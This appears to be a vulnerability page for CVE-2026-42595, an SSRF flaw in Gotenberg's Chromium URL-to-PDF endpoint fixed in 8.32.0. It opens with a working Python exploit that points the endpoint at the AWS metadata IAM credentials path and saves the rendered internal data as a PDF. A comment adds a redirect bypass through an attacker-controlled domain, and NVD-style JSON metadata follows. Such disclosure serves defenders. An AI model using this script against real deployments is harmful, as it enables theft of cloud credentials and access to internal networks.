CVE-2026-42595

import requests # Target URL of the vulnerable Gotenberg instance target_url = "http://localhost:3000/forms/chromium/convert/url" # Internal URL to access (e.g., Cloud Metadata or Admin Panel) # Example: AWS Metadata service malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # Alternatively, use a redirect bypass if direct access is blocked # malicious_url = "http://attacker-controlled-domain.com/redirect-to-internal" files = { 'url': (None, malicious_url) } response = requests.post(target_url, files=files) if response.status_code == 200: print("Exploit successful! SSRF response received.") # Save the PDF content containing the internal data with open("ssrf_result.pdf", "wb") as f: f.write(response.content) print("PDF saved as ssrf_result.pdf") else: print(f"Exploit failed with status code: {response.status_code}")

{"cve": {"id": "CVE-2026-42595", "sourceIdentifier": "[email protected]", "published": "2026-05-14T16:16:22.753", "lastModified": "2026-05-14T20:17:05.283", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gotenberg is a Docker-powered stateless API for PDF files. Prior to 8.32.0, Gotenberg's Chromium URL-to-PDF endpoint (/forms/chromium/convert/url) has no default protection against HTTP/HTTPS-based SSRF. The default deny-list regex only blocks file:// URIs. An unauthenticated attacker can point Chromium at any internal IP — including loopback, RFC 1918 ranges, and cloud metadata endpoints — and receive the response rendered as a PDF. Additionally, even when operators configure a custom deny-list, the protection is bypassed via HTTP redirects. Gotenberg's Chromium instance follows 302 redirects from an attacker-controlled external URL to internal targets without re-validating the redirect destination against the deny-list. This vulnerability is fixed in 8.32.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-chwh-f6gm-r836", "source": "[email protected]"}, {"url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-chwh-f6gm-r836", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}